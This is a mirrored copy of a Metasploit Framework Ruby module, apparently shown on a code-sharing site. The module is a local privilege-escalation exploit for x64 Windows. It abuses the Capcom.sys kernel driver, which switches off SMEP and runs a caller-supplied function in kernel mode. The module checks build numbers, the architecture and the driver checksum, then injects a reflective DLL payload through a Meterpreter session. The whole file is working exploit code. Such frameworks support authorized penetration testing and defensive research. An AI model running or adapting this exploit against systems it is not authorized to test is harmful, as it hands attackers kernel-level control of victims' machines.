Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
31445 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Windows::Priv

11
  include Msf::Post::Windows::Process

12
  include Msf::Post::Windows::ReflectiveDLLInjection

13
  prepend Msf::Exploit::Remote::AutoCheck

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',

21
          'Description' => %q{

22
            This module abuses the Capcom.sys kernel driver's function that allows for an

23
            arbitrary function to be executed in the kernel from user land. This function

24
            purposely disables SMEP prior to invoking a function given by the caller.

25
            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.

26
            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.

27
          },

28
          'License' => MSF_LICENSE,

29
          'Author' => [

30
            'TheWack0lian', # Issue discovery

31
            'OJ Reeves' # exploit and msf module

32
          ],

33
          'Platform' => 'win',

34
          'SessionTypes' => [ 'meterpreter' ],

35
          'DefaultOptions' => {

36
            'EXITFUNC' => 'thread'

37
          },

38
          'Targets' => [

39
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]

40
          ],

41
          'Payload' => {

42
            'Space' => 4096,

43
            'DisableNops' => true

44
          },

45
          'References' => [

46
            ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']

47
          ],

48
          'DisclosureDate' => '1999-01-01', # non-vuln exploit date

49
          'DefaultTarget' => 0,

50
          'Compat' => {

51
            'Meterpreter' => {

52
              'Commands' => %w[

53
                stdapi_fs_md5

54
                stdapi_sys_config_driver_list

55
              ]

56
            }

57
          },

58
          'Notes' => {

59
            'Reliability' => UNKNOWN_RELIABILITY,

60
            'Stability' => UNKNOWN_STABILITY,

61
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

62
          }

63
        }

64
      )

65
    )

66
  end

67


68
  def check

69
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

70


71
    version = get_version_info

72
    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?

73
      return Exploit::CheckCode::Unknown

74
    end

75


76
    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys

77
    if version.build_number > Rex::Version.new('10.0.22000.194')

78
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')

79
    end

80


81
    if sysinfo['Architecture'] != ARCH_X64

82
      return Exploit::CheckCode::Safe

83
    end

84


85
    # Validate that the driver has been loaded and that

86
    # the version is the same as the one expected

87
    client.sys.config.getdrivers.each do |d|

88
      next unless d[:basename].downcase == 'capcom.sys'

89


90
      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'

91
      target_checksum = client.fs.file.md5(d[:filename])

92


93
      if expected_checksum == Rex::Text.to_hex(target_checksum, '')

94
        return Exploit::CheckCode::Appears

95
      end

96
    end

97


98
    return Exploit::CheckCode::Safe

99
  end

100


101
  def exploit

102
    if is_system?

103
      fail_with(Failure::None, 'Session is already elevated')

104
    end

105


106
    check_result = check

107
    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown

108
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')

109
    end

110


111
    if sysinfo['Architecture'] == ARCH_X64

112
      if session.arch == ARCH_X86

113
        fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')

114
      end

115


116
      if target.arch.first == ARCH_X86

117
        fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')

118
      end

119
    end

120


121
    encoded_payload = payload.encoded

122
    execute_dll(

123
      ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),

124
      encoded_payload

125
    )

126


127
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

128
  end

129
end

130


131